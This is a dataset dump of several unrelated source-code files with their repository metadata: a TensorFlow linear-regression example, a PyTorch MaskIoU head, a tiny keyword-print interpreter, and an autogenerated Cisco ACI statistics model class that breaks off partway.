# from known weights/bias plus Gaussian noise.
x_data = np.random.randn(2000, 3)
w_real = [0.3, 0.5, 0.1]
b_real = -0.2
noise = np.random.randn(1, 2000) * 0.1
y_data = np.matmul(w_real, x_data.T) + b_real + noise
NUM_STEPS = 10
g = tf.Graph()
wb_ = []  # snapshots of [w, b] captured during training
with g.as_default():
    # Placeholders for the features (N x 3) and regression targets.
    x = tf.placeholder(dtype=tf.float32, shape=[None, 3])
    y_true = tf.placeholder(dtype=tf.float32, shape=None)
    with tf.name_scope('inference') as scope:
        # Linear model y = w @ x^T + b with zero-initialized parameters.
        w = tf.Variable([[0, 0, 0]], dtype=tf.float32, name='weights')
        b = tf.Variable(0, dtype=tf.float32, name='bias')
        y_pred = tf.matmul(w, tf.transpose(x)) + b
    with tf.name_scope('loss') as scope:
        # Mean squared error between targets and predictions.
        loss = tf.reduce_mean(tf.square(y_true - y_pred))
    with tf.name_scope('train') as scope:
        learning_rate = 0.5
        optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
        train = optimizer.minimize(loss)
    init = tf.global_variables_initializer()
    with tf.Session() as sess:
        sess.run(init)
        # Full-batch gradient descent for NUM_STEPS iterations.
        for step in range(NUM_STEPS):
            sess.run(train, {x: x_data, y_true: y_data})
            if step % 5 == 0:
                # Log and record the current parameter estimates.
                print(step, sess.run([w, b]))
                wb_.append(sess.run([w, b]))
print(10, sess.run([w, b])) | [
"broodsky1122@hanmail.net"
] | broodsky1122@hanmail.net |
53a3368b892b1ea07bd5aed868eef146253be066 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/others/CenterMask2/models/centermask2/centermask/modeling/centermask/maskiou_head.py | 23823fce2c12478ba7bdb4b83597a3363504cb80 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright (c) Sangrok Lee and Youngwan Lee (ETRI) All Rights Reserved.
import torch
from torch import nn
from torch.nn import functional as F
from detectron2.layers import Conv2d, ShapeSpec, cat
from detectron2.utils.registry import Registry
from centermask.layers import MaxPool2d, Linear
# Global registry mapping head names (cfg.MODEL.ROI_MASKIOU_HEAD.NAME)
# to their implementing classes; see build_maskiou_head below.
ROI_MASKIOU_HEAD_REGISTRY = Registry("ROI_MASKIOU_HEAD")
ROI_MASKIOU_HEAD_REGISTRY.__doc__ = """
Registry for maskiou heads, which predicts predicted mask iou.
The registered object will be called with `obj(cfg, input_shape)`.
"""
def mask_iou_loss(labels, pred_maskiou, gt_maskiou, loss_weight, weight):
    """
    Compute the weighted L2 maskiou regression loss.

    Args:
        labels (Tensor): mask class label per instance, shape (N,)
        pred_maskiou (Tensor): predicted iou per class, shape (N, C)
        gt_maskiou (Tensor): ground-truth iou per instance, shape (N,)
        loss_weight (float): scalar multiplier applied to the final loss
        weight (Tensor): per-instance weighting factor, shape (N,)

    Returns:
        Tensor: scalar loss; a graph-connected zero when there are no
        instances.
    """
    def l2_loss(pred, target):
        # Squared error restricted to instances whose gt iou is positive,
        # normalized by the number of such instances.  (Renamed the
        # original parameter `input`, which shadowed the builtin.)
        pos_inds = target > 0.0
        num_pos = pos_inds.sum()
        if num_pos > 0:
            # |pred - target|**2 == (pred - target)**2, so drop the abs.
            loss = 0.5 * (pred - target) ** 2 / num_pos
        else:
            loss = pred * 0.0
        return (loss * weight.float() * pos_inds.float()).sum()

    if labels.numel() == 0:
        # No instances: return zero while keeping the autograd graph alive.
        return pred_maskiou.sum() * 0

    # Select each instance's prediction for its own class.  Create the
    # index directly on the target device instead of CPU-then-copy.
    index = torch.arange(pred_maskiou.shape[0], device=pred_maskiou.device)
    maskiou_loss = l2_loss(pred_maskiou[index, labels], gt_maskiou)
    return loss_weight * maskiou_loss
def mask_iou_inference(pred_instances, pred_maskiou):
    """Rescale each instance's score by its predicted mask iou, storing
    the result as ``mask_scores`` on every Instances object (in place)."""
    # Gather the predicted class of every instance across all images.
    labels = cat([inst.pred_classes for inst in pred_instances])
    row_idx = torch.arange(pred_maskiou.shape[0], device=labels.device).long()
    # Pick each mask's iou for its own predicted class, then split the
    # flat tensor back into per-image chunks.
    per_image_counts = [len(inst) for inst in pred_instances]
    per_image_ious = pred_maskiou[row_idx, labels].split(per_image_counts, dim=0)
    for ious, inst in zip(per_image_ious, pred_instances):
        inst.mask_scores = inst.scores * ious
@ROI_MASKIOU_HEAD_REGISTRY.register()
class MaskIoUHead(nn.Module):
    """Predicts the IoU between each predicted mask and its ground truth.

    The head concatenates the RoI mask features with the (max-pooled)
    predicted mask, runs them through a small conv + FC stack, and emits
    one iou score per class.
    """

    def __init__(self, cfg, input_shape: ShapeSpec):
        """
        Args:
            cfg: detectron2-style config node; reads
                MODEL.ROI_HEADS.NUM_CLASSES and MODEL.ROI_MASKIOU_HEAD.*.
            input_shape (ShapeSpec): shape of the incoming mask features;
                one extra input channel is added for the mask itself.
        """
        super(MaskIoUHead, self).__init__()
        # fmt: off
        num_classes = cfg.MODEL.ROI_HEADS.NUM_CLASSES
        conv_dims = cfg.MODEL.ROI_MASKIOU_HEAD.CONV_DIM
        num_conv = cfg.MODEL.ROI_MASKIOU_HEAD.NUM_CONV
        input_channels = input_shape.channels + 1
        resolution = input_shape.width // 2
        # fmt: on
        self.conv_relus = []
        stride = 1
        # Stack of 3x3 convs with ReLU; only the last conv downsamples
        # (stride 2), which is why `resolution` above is width // 2.
        for k in range(num_conv):
            if (k+1) == num_conv:
                stride = 2
            conv = Conv2d(
                input_channels if k == 0 else conv_dims,
                conv_dims,
                kernel_size=3,
                stride=stride,
                padding=1,
                activation=F.relu
            )
            self.add_module("maskiou_fcn{}".format(k+1), conv)
            self.conv_relus.append(conv)
        self.maskiou_fc1 = Linear(conv_dims*resolution**2, 1024)
        self.maskiou_fc2 = Linear(1024, 1024)
        self.maskiou = Linear(1024, num_classes)
        self.pooling = MaxPool2d(kernel_size=2, stride=2)
        # Kaiming init for conv and hidden FC layers; small-variance
        # normal init for the final iou regressor.
        for l in self.conv_relus:
            nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
            nn.init.constant_(l.bias, 0)
        for l in [self.maskiou_fc1, self.maskiou_fc2]:
            nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
            nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.maskiou.weight, mean=0, std=0.01)
        nn.init.constant_(self.maskiou.bias, 0)

    def forward(self, x, mask):
        """
        Args:
            x (Tensor): RoI mask features; concatenated with the pooled
                mask along the channel axis (dim 1).
            mask (Tensor): predicted masks, max-pooled (2x2, stride 2)
                before concatenation.

        Returns:
            Tensor: per-class maskiou predictions, shape (N, num_classes).
        """
        mask_pool = self.pooling(mask)
        x = torch.cat((x, mask_pool), 1)
        for layer in self.conv_relus:
            x = layer(x)
        x = torch.flatten(x, 1)
        x = F.relu(self.maskiou_fc1(x))
        x = F.relu(self.maskiou_fc2(x))
        x = self.maskiou(x)
        return x
def build_maskiou_head(cfg, input_shape):
    """
    Build a mask iou head defined by `cfg.MODEL.ROI_MASKIOU_HEAD.NAME`.
    """
    head_cls = ROI_MASKIOU_HEAD_REGISTRY.get(cfg.MODEL.ROI_MASKIOU_HEAD.NAME)
    return head_cls(cfg, input_shape)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
cee4f5e9ab599c026446b96d93c2e66655e40d5a | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/e1d.py | f4e740d648e64bd3e1c4e1cecebe54f7d92f4451 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    """Print the tokens enclosed between a pair of bare '"' tokens.

    *lineRemaining* is a list of whitespace-split tokens.  If the first
    and last tokens are both a lone double quote, the tokens between
    them are printed joined by single spaces (an empty quote pair
    prints a blank line); otherwise nothing is printed.
    """
    # print() is called as a function so the script runs on Python 3 as
    # well as Python 2 (the original used Python 2 print statements).
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # data to print: strip the surrounding quote tokens
            lineRemaining = lineRemaining[1:-1]
            print(' '.join(lineRemaining))
        else:
            print('')
def main(fileName):
    """Interpret *fileName* line by line.

    Each line must start with the keyword 'e1D'; the remaining tokens
    are handed to printFunction.  The first line that does not start
    with the keyword (including blank lines) prints ERROR and stops.
    """
    with open(fileName) as f:
        for line in f:
            data = line.split()
            # Check `data` is non-empty before indexing so a blank line
            # reports ERROR instead of raising IndexError.
            if data and data[0] == 'e1D':
                printFunction(data[1:])
            else:
                print('ERROR')
                return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c1c6756e478054f83269309dca7764671c194c3a | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/eqptcapacity/l3v6usage1281w.py | eee8ed196b025d43c82b77745a416ef422f9880d | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,152 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class L3v6Usage1281w(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.eqptcapacity.L3v6Usage1281w", "Layer3 v6 128 entries usage count")
counter = CounterMeta("v6Total", CounterCategory.COUNTER, "count", "Total v6 128 Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6TotalLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6TotalCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6TotalPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6TotalMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6TotalMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6TotalAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6TotalSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6TotalBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6TotalThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6TotalTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6TotalTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6TotalRate"
meta._counters.append(counter)
counter = CounterMeta("v6Mc", CounterCategory.COUNTER, "count", "Total v6 128 MC Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6McLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6McCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6McPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6McMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6McMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6McAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6McSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6McBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6McThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6McTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6McTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6McRate"
meta._counters.append(counter)
counter = CounterMeta("v6Uc", CounterCategory.COUNTER, "count", "Total v6 128 UC Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6UcLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6UcCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6UcPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6UcMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6UcMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6UcAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6UcSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6UcBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6UcThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6UcTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6UcTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6UcRate"
meta._counters.append(counter)
counter = CounterMeta("v6Ep", CounterCategory.COUNTER, "count", "Total v6 128 Endpoints")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6EpLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6EpCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6EpPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6EpMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6EpMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6EpAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6EpSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6EpBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6EpThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6EpTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6EpTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6EpRate"
meta._counters.append(counter)
meta.moClassName = "eqptcapacityL3v6Usage1281w"
meta.rnFormat = "CDeqptcapacityL3v6Usage1281w"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Layer3 v6 128 entries usage count stats in 1 week"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.eqptcapacity.Entity")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.eqptcapacity.L3v6Usage128")
meta.rnPrefixes = [
('CDeqptcapacityL3v6Usage1281w', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "v6EpAvg", "v6EpAvg", 44094, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 Endpoints average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpAvg", prop)
prop = PropMeta("str", "v6EpBase", "v6EpBase", 44089, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 Endpoints baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpBase", prop)
prop = PropMeta("str", "v6EpCum", "v6EpCum", 44090, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 Endpoints cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpCum", prop)
prop = PropMeta("str", "v6EpLast", "v6EpLast", 44088, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 Endpoints current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpLast", prop)
prop = PropMeta("str", "v6EpMax", "v6EpMax", 44093, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 Endpoints maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpMax", prop)
prop = PropMeta("str", "v6EpMin", "v6EpMin", 44092, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 Endpoints minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpMin", prop)
prop = PropMeta("str", "v6EpPer", "v6EpPer", 44091, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 Endpoints periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpPer", prop)
prop = PropMeta("str", "v6EpRate", "v6EpRate", 44099, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 Endpoints rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpRate", prop)
prop = PropMeta("str", "v6EpSpct", "v6EpSpct", 44095, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 Endpoints suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpSpct", prop)
prop = PropMeta("str", "v6EpThr", "v6EpThr", 44096, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 Endpoints thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6EpThr", prop)
prop = PropMeta("str", "v6EpTr", "v6EpTr", 44098, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 Endpoints trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpTr", prop)
prop = PropMeta("str", "v6EpTrBase", "v6EpTrBase", 44097, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 Endpoints trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpTrBase", prop)
prop = PropMeta("str", "v6McAvg", "v6McAvg", 44115, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 MC Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McAvg", prop)
prop = PropMeta("str", "v6McBase", "v6McBase", 44110, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 MC Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McBase", prop)
prop = PropMeta("str", "v6McCum", "v6McCum", 44111, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 MC Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McCum", prop)
prop = PropMeta("str", "v6McLast", "v6McLast", 44109, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 MC Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McLast", prop)
prop = PropMeta("str", "v6McMax", "v6McMax", 44114, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 MC Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McMax", prop)
prop = PropMeta("str", "v6McMin", "v6McMin", 44113, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 MC Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McMin", prop)
prop = PropMeta("str", "v6McPer", "v6McPer", 44112, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 MC Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McPer", prop)
prop = PropMeta("str", "v6McRate", "v6McRate", 44120, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 MC Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McRate", prop)
prop = PropMeta("str", "v6McSpct", "v6McSpct", 44116, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 MC Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McSpct", prop)
prop = PropMeta("str", "v6McThr", "v6McThr", 44117, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 MC Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
